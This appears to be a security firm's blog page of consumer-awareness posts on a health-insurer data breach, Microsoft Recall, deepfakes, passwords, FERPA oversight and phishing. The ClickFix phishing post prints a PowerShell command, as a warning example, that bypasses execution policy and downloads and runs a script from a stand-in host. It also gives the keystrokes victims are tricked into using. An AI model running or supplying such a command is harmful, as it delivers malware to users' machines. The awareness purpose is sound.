Experiencing a Breach?
1-877-353-8352

Blue Shield CA Data Breach: Protecting Your Information

Anthony Duran on May 8, 2025

On April 9, Blue Shield of California disclosed a potential data breach that involved member’s data being shared through Google Ads. Blue Shield has noted the following as affected:  

“Insurance plan name, type and group number; city; zip code; gender; family size; Blue Shield assigned identifiers for members’ online accounts; medical claim service date and service provider, patient name, and patient financial responsibility; and “Find a Doctor” search criteria and results (location, plan name and type, provider name and type).” 

 Blue Shield has confirmed that no other information was given like Social Security numbers or driver’s license numbers.  

The recent data breach at Blue Shield of California has raised concerns about the security of personal health data. If you’re a Blue Shield member or concerned about how such breaches can impact your security, please take a moment to read some safety precautions you can take.  

Stay Informed

The first step after any data breach is to stay informed. Blue Shield has been notifying members about the breach and what information was exposed. Keep an eye on emails or web updates from the company to understand the scope of the incident and what actions they are taking to mitigate the risks. 

Monitor Your Medical Records

It’s important to regularly review your medical records for any unfamiliar treatments or services that could signal fraudulent claims. By checking your Explanation of Benefits (EOB) statements, you can spot any suspicious activity early and report it to your provider.

Use Identity Monitoring Services

In the aftermath of a breach, many companies offer free credit and identity monitoring. Take advantage of these services to monitor any unusual activity tied to your personal data, including medical identity theft or misuse of your Social Security number. LifeLock by Norton is the most popular service for identity theft protection. There are several other companies that offer similar services like Guardio, IDShield, and Identity Force 

Freeze Your Credit

If you’re concerned about potential identity theft, freezing your credit with major credit bureaus (Equifax, Experian, etc.) can help prevent fraudulent account creation and use.  

Strengthening Your Online Security

After a breach, it’s a good idea to update your passwords and use two-factor authentication wherever possible. This added layer of security can help protect your accounts from unauthorized access. Be wary of phishing emails that may attempt to trick you into sharing sensitive information. This is especially important after a breach like this one as scammers may be trying to take advantage of the situation.  

See our guide on setting up 2FA for more help.   

File a Complaint if Necessary

If you feel that your data hasn’t been properly protected, you can file a complaint with the Department of Health and Human Services Office for Civil Rights or your state’s attorney general. It’s essential to hold organizations accountable for protecting your personal data. 

AI Could be Taking More Than it is Giving

Anthony Duran on May 7, 2025

What is Recall?

Microsoft first introduced Copilot’s Recall feature in May 2024 with the launch of Copilot+ PCs. Recall automatically captures encrypted snapshots of your screen every few seconds, allowing you to search your on-screen history using more colloquial language.

Retrace your steps with Recall

Credit: Microsoft 

The data stays local on your device. After privacy concerns, Microsoft officially released Recall in April 2025 with improvements, including making Recall disabled by default which gives users more control over their involvement.  

Security Concerns

Copilot’s Recall functionality is a great tool that can help many people; however, it is inherently dangerous to cyber and personal security. Apps like Signal, known for their safety by having disappearing messages, could be obsolete if even one of the users in a conversation has Recall since it can store sensitive information even after it is deleted from Signal.  

Even if you opt out of Recall, whoever you are communicating with could be opted in, and your conversations or information shared could be stored, even after you delete them. Conversations will no longer be gone when deleted, but instead are saved to the opted-in user’s storage. Moreover, there is no notification that Recall is storing the information of a user (opted out) who is engaged in a conversation with another user who is using Recall.  

Be cautious of what you share. It has been a common practice to be careful of what you share on the internet since its dawn, but now it could be more important than ever as even trusted people could inadvertently capture your information. Recall could still be a risk for someone who has opted out through daily conversations. As of now, the only way for Recall to not store information is for both parties to opt out. 

Opting Out

Copilot’s Recall was re-released on the latest Windows 11 24h2 update (KB055627). Recall is only available on Copilot+ PCs. If you do not have a Copilot+ PC you do not have to worry about having Recall yet, but you will have to be wary about those who have a Copilot+ PC and have installed the newest update for Windows.  

If you do have a Copilot+ PC and want to opt out, follow these steps:  

Go to Settings > Privacy & security > Recall & snapshots. When you have navigated here, simply toggling it off. 

If you want to keep it but only want it off for a day, you can easily pause Recall by selecting the Recall icon in your system tray and selecting the pause option.  

The Deepfake Dilemma: Rising Threats and How to Stay Protected

Anthony Duran on April 29, 2025

Deepfakes, AI-generated audio, video, or images designed to mimic real people, have quickly evolved from experimental curiosities into dangerous tools for deception. As technology continues to advance, so does the ability for malicious actors to weaponize deepfakes for fraud, misinformation, and personal attacks. In 2025, the deepfake landscape presents serious challenges across personal, professional, and political arenas. 

How Deepfakes are Made

Deepfakes are created using artificial intelligence, specifically deep learning models like autoencoders or generative adversarial networks (GANs). The process starts by training these models on large datasets of photos and videos of a person, allowing the AI to learn facial expressions, movements, and voice patterns. Once trained, the model can generate realistic but fake content by swapping faces in videos or mimicking voices. After the initial creation, post-processing techniques help enhance realism, such as smoothing artifacts (noticeable errors like 4 or 6 fingers or unnatural twitches) and syncing lip movements. Common software used to make deepfakes includes DeepFaceLab, Faceswap, Avatarify, and voice cloning tools like Descript’s Overdub. While these tools can be used creatively in entertainment or education, they also raise serious concerns around misinformation and impersonation.  

This is an example of a deepfake side by side comparison.  

The Growing Impact of Deepfakes

Victims of deepfakes, particularly women and minors,* are increasingly targeted with explicit or defamatory content. These fabricated videos can cause severe emotional distress, social stigma, and career harm, even when the content is proven false. Criminals are also using deepfakes to impersonate executives and trick employees into transferring money or divulging sensitive information. A commonly known deepfake scam happened last year as criminals exploited a company approximately $25 million USD 

*Read more about why women and minors are targeted more than other demographics. 

Video conferencing tools and voice messaging platforms are now common channels for these scams, which can cause massive financial losses. In the political sphere, deepfakes of public figures are being used to spread false narratives and incite unrest. As these videos go viral on social media, they erode public trust, manipulate public opinion, and undermine democratic processes.  

Protecting Against Deepfake Threats

To protect against these threats, it is important to verify content before sharing. One quick way to check is looking at the URL. Authenticity should never be assumed. Always check for inconsistencies in movement, lighting, or speech patterns and cross-reference information with trusted news outlets or official sources. AI-powered detection tools can also be used to identify deepfakes, analyzing digital fingerprints, facial patterns, and audio signals for manipulation. Limiting personal exposure online is another effective measure. Reducing the availability of personal photos, videos, and voice recordings by adjusting privacy settings can help limit the data that deepfake creators rely on.  

It is important to understand the legal tools that are available as more states are introducing legislation to combat deepfakes. In an effort to defend against deepfakes, New Jersey passed legislation in April 2025 against “deceptive media made with artificial intelligence”. This is not long after California’s AB2655, which helps defend against deepfak es in the political setting. 

Moving Forward in the Deepfake Era

Deepfakes will continue to improve in quality and accessibility, making detection and prevention more difficult. A combination of legal protections, public awareness, and evolving technology will be essential in managing this growing threat. Digital literacy and critical thinking are more important than ever. Understanding how deepfakes are made and used can empower individuals and organizations to better protect themselves and others from the harm they may cause.

Strong Passwords: Best Practices for Protection and Prevention

Anthony Duran on April 25, 2025

Strong password habits are essential to protecting personal and professional data from cyber threats. Weak passwords are one of the biggest security risks, making it easier for hackers to gain unauthorized access to accounts. In an increasingly digital world, following the best practices for password security can reduce the risk of data breaches and identity theft.

Best Password Protection Practices

  • Use Unique Passwords for Each Account Reusing passwords across multiple accounts increases the risk of a security breach. If one password is compromised, hackers can access all accounts that share the same credentials.
  • Create Complex Passwords A strong password should be at least 12 characters long and include a mix of uppercase and lowercase letters, numbers, and special characters. Avoid using easily guessed words like “password” or “123456”.
  • Enable Multi-Factor Authentication (MFA) MFA adds an extra layer of security by requiring a second form of verification, such as a code sent to your phone or an authentication app.
  • Use a Password Manager Password managers help generate and store complex passwords securely. This reduces the need to remember multiple passwords while keeping them protected. Apple’s iCloud Keychain is a perfect example.
  • Avoid Sharing Passwords Sharing passwords, even with trusted individuals, increases the risk of unauthorized access. If you need to send an email, Office365 has the option to make emails encrypted with the following steps:
    • Creating a new email
    • Going to ‘Options:
Email Encryption Option
    • Finding the lock button in the upper right corner of the task bar and selectingEncrypt’:

*A second option is to simply type “confidential” in the subject line to encrypt the email, and this will still show the word “confidential” in the subject line as seen above. This can be done at any point in the subject line.

  • Change Passwords Periodically Regularly updating passwords helps minimize the risk of long-term exposure in case of a security breach. Change passwords immediately if you suspect any unauthorized access. 
  • Be Cautious of Phishing Attacks Cybercriminals use phishing emails and fake websites to trick users into revealing their passwords. Always verify the legitimacy of emails and websites before entering credentials. For example, a fraudulent website may replace easily mistakable letters like uppercase “i” for lowercase “L. This could look as convincing as PayPaI(.)com If you ever feel that the URL may be compromised, you can always type the URL you know to be correct manually. 

By adopting these password protection habits, you can strengthen your online security and reduce the risk of cyber threats. Taking a proactive approach to password management is a simple yet effective way to safeguard your personal and professional information. Taking an extra minute to verify if something is legitimate may save hours of hassle.  

The Department of Education’s Current Status

Anthony Duran on April 11, 2025

As of March 21, 2025, the U.S. Department of Education (ED) has reduced its workforce to approximately 2,183 employees—a stark drop from the 4,133 employees who served at the start of President Trump’s term. While the Department continues to function, this nearly 50% reduction in staffing raises serious concerns about its ability to deliver on core responsibilities, especially in areas related to student data privacy and cybersecurity oversight. 

One of the offices most affected is the Family Policy Compliance Office (FPCO), the team charged with enforcing the Family Educational Rights and Privacy Act (FERPA). With a diminished staff, the FPCO will likely face significant delays in processing complaints and ensuring educational institutions comply with federal privacy laws. 

Although the Department remains active and continues to issue public press releases, industry leaders and cybersecurity experts are raising alarm bells. Their concerns are not just about internal slowdowns—but about a weakened infrastructure that leaves millions of students’ personal data vulnerable to breaches, misuse, and long-term harm. 

Why This Matters: FERPA at Risk

FERPA is a cornerstone of student privacy in the United States. It gives parents and eligible students the right to: 

  • Access their education records 
  • Request corrections to inaccurate data 
  • Control the disclosure of personal information from those records 

Without the proper enforcement of FERPA, these protections are at risk. Educational institutions already struggle to comply with privacy standards due to budget constraints and varying levels of IT expertise. When oversight is weak or delayed, the consequences can be serious—from unauthorized access to student data to full-scale data breaches. 

The FPCO’s workload is significant, and with fewer staff to investigate complaints or provide guidance, issues may fall through the cracks. This isn’t just speculation: industry leaders have publicly warned that the ED’s workforce reduction will slow down data protection efforts and weaken the very standards meant to protect families. 

According to StateScoop, industry groups and cybersecurity experts have been “alarmed” by the cuts. The Consortium for School Networking (CoSN) expressed concern that cybersecurity will take a backseat as resources dwindle. Cyberattacks on school systems have already been increasing year-over-year, and the federal government is one of the few support systems local schools can rely on for guidance. 

Even more direct are the warnings in Fox4KC’s report. The article highlights expert opinions stating that student privacy is “squarely at risk” if the ED is eliminated or scaled back any further. FERPA, they argue, doesn’t enforce itself—it requires active oversight and intervention. 

The Bigger Picture: Cybersecurity & the Education Sector

It’s important to understand the broader context. The education sector has become an increasingly frequent target for cyberattacks. Hackers view K–12 institutions and universities as vulnerable and lucrative targets due to the volume of sensitive data they hold—names, addresses, social security numbers, medical records, and more. 

When data breaches occur, students and their families can face long-term consequences such as identity theft, credit damage, and emotional distress. The ability of federal agencies like the ED to step in and enforce data privacy standards is not a luxury—it’s a necessity. 

With the ED’s reduced workforce, fewer audits, delayed investigations, and weakened compliance follow-ups are almost inevitable. This creates a dangerous environment where bad actors can exploit loopholes or slow enforcement cycles. 

Schools may also suffer from a lack of clear direction on how to improve their own cybersecurity. Many districts lack the resources or expertise to implement best practices and often rely on federal guidance to do so. If that guidance is no longer available in a timely or consistent way, school systems may be left to fend for themselves—an uneven playing field that leaves students in less-resourced areas especially vulnerable. 

What You Can Do to Protect Your Family’s Information

While systemic protections are essential, individual families still have the power to take important steps to safeguard their own data. Here are a few key actions you can take: 

  1. Strengthen Passwords

Use strong, unique passwords for each of your online accounts, especially those related to school portals, parent portals, or educational apps. A password manager can help you keep track of them all securely. 

  1. Enable Multi-Factor Authentication (MFA)

Whenever possible, turn on MFA for added protection. This often involves receiving a code via text or email before logging in, making it much harder for unauthorized users to access your accounts. 

  1. Stay Alert to Phishing

Teach your family to recognize phishing emails and suspicious links. These scams often look like legitimate communication from schools but are actually designed to steal information. 

  1. Update Devices Regularly

Make sure all devices—laptops, tablets, phones—are updated with the latest security patches and operating systems. 

  1. Avoid Public Wi-Fi for Sensitive Tasks

Never access sensitive education-related accounts or financial information while on public Wi-Fi unless you’re using a secure Virtual Private Network (VPN). 

  1. Request Transparency from Schools

You have the right to ask schools how they manage and protect your child’s data. If they use third-party vendors or cloud services, ask about their policies and compliance with FERPA. 

Advocating for Stronger Protections

Beyond taking personal precautions, families can and should advocate for systemic change: 

  • Contact school administrators and local school boards to ask how they’re adapting to the ED’s reduced support. 
  • Support legislation at the state and federal level that enhances cybersecurity funding and mandates minimum privacy standards in schools. 
  • Join or start parent advocacy groups that can elevate these concerns and push for better data practices. 

Stay Informed

Despite the reduction in staff, the U.S. Department of Education remains active and continues to post updates and press releases. Staying informed can help you understand what changes are occurring at the federal level and how they may affect your community. 

Visit https://www.ed.gov/about/news for the latest developments. 

References

The Rise of Advanced Phishing Scams and How to Stay Safe

Anthony Duran on March 21, 2025

Phishing attacks continue to evolve as cybercriminals develop new techniques to deceive users and steal sensitive information. One emerging method is ClickFix, a social engineering tactic that tricks users into executing malicious commands by disguising them as legitimate actions, such as CAPTCHA verifications or system fixes. Attackers use phishing emails and malicious ads to direct victims to deceptive websites, where clipboard manipulation convinces a victim to copy a command that runs a malicious script, often using built-in system tools like PowerShell or Command Prompt, to download and execute malware, steal credentials, or establish persistent access.  Recent campaigns have used ClickFix to distribute malware like Lumma Stealer, DarkGate, and remote access trojans. 

Another growing phishing scam is the QR code phishing attack, often referred to as “Quishing”  Cybercriminals embed QR codes in phishing emails, pretending to be from trusted sources like banks, delivery services, or corporate IT departments. When users scan these QR codes with their smartphones, they are redirected to fake login pages that steal their credentials. Since mobile devices do not always display full URLs, users may not realize they are on a malicious site until their information has already been compromised. 

How to Stay Safe

With phishing attacks becoming more sophisticated, it is essential to take proactive steps to protect yourself and your organization. Here are a few recommendations:

    • Always verify the source of an email before clicking on links or scanning QR codes. If something seems suspicious, contact the sender through official channels. This can be done through emailing the person or service directly asking for confirmation or through another trusted form of communication, before acting. 
    • Do not run commands provided by unknown sources, even if they appear to be part of a system fix or security verification. For example: 
      powershell -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://malicious.com/script.ps1’)”  
      could be inserted through three steps
       
      1.   ⊞ +R  
      2.   CTRL+V 
      3.   Enter 
    • Enable multi-factor authentication (MFA) on all accounts to add an extra layer of security against credential theft. Check out our guide on setting up 2FA (Two-Factor Authentication) for various email services.  
    • Keep software and security tools updated to detect and block phishing attempts before they cause harm. 
    • Educate employees and team members about common phishing tactics to reduce the risk of falling for social engineering scams. 

By staying informed and vigilant, individuals and businesses can significantly reduce the likelihood of becoming victims of phishing scams. The most effective way to avoid a scam is to ask yourself three questions, Is this urgent? Is this unexpected? Is this too good to be true? These three questions will help save you time and stress from being a victim of a scam 

company

headquarters

sign up for our newsletter

ⓒ 2025 horizon helix, All rights reserved
Linkedin-in